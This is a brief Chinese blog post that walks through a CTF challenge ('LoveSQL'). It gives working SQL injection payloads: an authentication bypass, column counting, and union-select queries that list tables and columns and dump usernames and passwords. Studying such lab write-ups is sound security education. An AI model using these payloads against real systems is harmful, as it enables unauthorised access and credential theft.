[极客大挑战 2019]LoveSQL

打开是一个登录界面
使用admin' or 1#万能密码绕过密码登录


再使用admin' order by 3#找回显的列数,结果为3,再使用a' union select 1,2,3#找回显的列,结果为2,3

后面就是常规的union注入流程

# 找数据库和表名
a' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()#
# 找geekuser表所有列名
a' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='geekuser'#
# 查geekuser所有信息
a' union select 1,group_concat(username),group_concat(password) from geekuser#
# 找l0ve1ysq1表所有列名
a' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'#
# 查l0ve1ysq1所有信息
a' union select 1,group_concat(username),group_concat(password) from l0ve1ysq1#


posted @ 2024-11-18 23:06  一只本本  阅读(3)  评论(0编辑  收藏  举报